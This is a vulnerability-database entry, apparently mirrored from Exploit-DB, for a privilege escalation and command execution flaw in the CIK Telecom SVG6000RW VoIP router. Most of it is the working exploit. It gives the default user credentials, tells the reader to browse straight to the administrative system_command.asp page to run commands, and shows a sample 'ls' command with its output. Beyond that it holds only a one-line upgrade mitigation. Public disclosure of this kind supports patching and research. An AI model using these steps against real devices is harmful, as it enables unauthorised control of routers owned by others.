CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution

vendor:

SVG6000RW

by:

Chako

8,8

CVSS

HIGH

Privilege Escalation and Command Execution

N/A

CWE

Product Name: SVG6000RW

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: h:cik_telecom:svg6000rw

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution

CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerabilitie and can lead to Command Execution. Login as a normal user with default username 'User' and password 'cikvoip' and change URL to http://URL/adm/system_command.asp and now u can run commands.

Mitigation:

Upgrade to the latest version of the CIK Telecom VoIP router SVG6000RW

Source

Exploit-DB raw data:

####################################################################
#
# Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution
# Date: 2014/12/10
# Exploit Author: Chako
# Vendor Homepage: https://www.ciktel.com/
#
####################################################################

Description:
  CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerabilitie
  and can lead to Command Execution.


Exploit:

1) Login as a normal user 
   Default Username: User Password:cikvoip

2) change URL to http://URL/adm/system_command.asp
   and now u can run commands.


Example:

Command: ls /etc_rw/web

Result:

internet
cgi-bin
homemode_conf.asp
menu-en.swf
wireless
md5.js
hotelmode_conf.asp
waitAndReboot.asp
graphics
menu.swf
getMac.asp
quickconfig.asp
javascript
firewall
home.asp
customermode_conf.asp
wait.asp
station
login.asp
main.css
overview.asp
style
voip
lang
wps
usb
adm